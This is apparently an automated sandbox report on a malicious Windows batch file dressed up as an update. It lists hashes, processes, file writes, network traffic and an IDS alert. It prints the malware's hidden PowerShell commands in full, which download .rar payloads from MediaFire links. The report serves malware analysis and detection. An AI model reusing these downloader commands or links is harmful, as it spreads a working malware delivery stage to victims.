Field | Value |
---|---|
File name | ▶️Update_№16808_Open____________________________________.bat |
Full analysis | https://app.any.run/tasks/23973f5d-b2ec-4381-bea2-0c35be6c4371 |
Verdict | Malicious activity |
Analysis date | April 01, 2023, 09:04:19 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Indicators | — |
MIME | text/plain |
File info | ASCII text, with very long lines, with CRLF line terminators |
MD5 | 554142645426B4E3B0D8594BFF09B0F9 |
SHA1 | B695EA8044EB3C605455B74FDBB179813E44EA2B |
SHA256 | EAD93A91B05CFC325F236397F6357B24DB86A374BADEC74F07374A3E9CF0C454 |
SSDEEP | 96:CSG+39DwW5z5+39DwW5P+gD9DwW5/+gz9DwW5a+U9hX6IJADeHTKPfOY5Pk5:jn9M0zc9M0DD9M0Tz9M0wv6IJADeHmPM |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
624 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\▶️Update_№16808_Open____________________________________.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 255; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
596 | powershell -windowstyle hidden -Command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 4294770688; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
956 | powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/1ush0ujca5221mj/axorojeyi1.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\admin\AppData\Local\Temp\weba.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
1748 | powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/l25w81fnaj63swq/bipicajuva2.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\admin\AppData\Local\Temp\webb.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
244 | C:\Windows\system32\cmd.exe /c find "https://download" C:\Users\admin\AppData\Local\Temp\weba.html \| find /i ".rar" | C:\Windows\System32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1976 | find "https://download" C:\Users\admin\AppData\Local\Temp\weba.html | C:\Windows\System32\find.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Find String (grep) Utility; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1636 | find /i ".rar" | C:\Windows\System32\find.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Find String (grep) Utility; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Key | Operation | Name | Value |
---|---|---|---|---|---|
956 | powershell.exe | HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E | write | LanguageList | en-US |
1748 | powershell.exe | HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E | write | LanguageList | en-US |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
956 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | 80F76A9B07C930826A7D1F2068C8E56E | 13C190ED655762B9F2FD4BFF252CB972846C5B8BE3F361B8106702D273330902 |
1748 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xg5kej02.1vz.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
956 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | 446DD1CF97EABA21CF14D03AEBC79F27 | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
1748 | powershell.exe | C:\Users\admin\AppData\Local\Temp\gunedklq.t0s.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\1c22xvr1.jpa.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\epwmie4o.vdv.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
956 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | E71C8443AE0BC2E282C73FAEAD0A6DD3 | 95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72 |
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\CabB0E7.tmp | compressed | E71C8443AE0BC2E282C73FAEAD0A6DD3 | 95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72 |
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TarB0E8.tmp | cat | BE2BEC6E8C5653136D3E72FE53C98AA3 | 1919AAB2A820642490169BDC4E88BD1189E22F83E7498BF8EBDFB62EC7D843FD |
596 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | dbf | 446DD1CF97EABA21CF14D03AEBC79F27 | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
956 | powershell.exe | GET | 200 | 8.248.139.254:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b4b01606f6b4990d | US | compressed | 61.1 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
956 | powershell.exe | 104.16.54.48:443 | www.mediafire.com | CLOUDFLARENET | — | suspicious |
1748 | powershell.exe | 104.16.54.48:443 | www.mediafire.com | CLOUDFLARENET | — | suspicious |
956 | powershell.exe | 8.248.139.254:80 | ctldl.windowsupdate.com | LEVEL3 | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.mediafire.com | | shared |
ctldl.windowsupdate.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup |